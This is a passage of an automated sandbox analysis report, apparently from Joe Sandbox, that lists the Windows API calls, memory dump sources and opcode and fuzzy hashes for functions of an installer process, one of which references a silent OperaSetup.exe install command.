• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$H'D
• API String ID: 3540041739-2781796796
• Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
• Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
• Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
• Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
• CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
• CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
• CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
• Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
• Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
• Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
• Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
• Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
• Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
• Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
• Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
• Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
• Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
APIs
• GetDC.USER32(?), ref: 00401E76
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
• ReleaseDC.USER32(?,00000000), ref: 00401EA9
• CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
• Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
• Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
• Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
• Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
• Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
• Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
APIs
• IsWindowVisible.USER32(?), ref: 004056CA
• CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
  • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
• Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
• Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
• Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D
APIs
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,0043A728,?,00004000,00000000,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000,004067E1,80000002), ref: 004065B6
• RegCloseKey.ADVAPI32(?), ref: 004065C1
Strings
• "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0, xrefs: 00406577
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
• API String ID: 3356406503-3663954162
• Opcode ID: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
• Instruction ID: 7e3264d492d8171c025e68cf2784a3a6e2d975f6d7be64ef5dd4a0d5c385ab57
• Opcode Fuzzy Hash: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
• Instruction Fuzzy Hash: E1017C72500209BBDF218F55DC09EDB3BA8EF54364F01403AFE16A2190E378DA64DBA4
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
• CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
• lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
Memory Dump Source
• Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_400000_ya.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
• Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
• Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
• Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99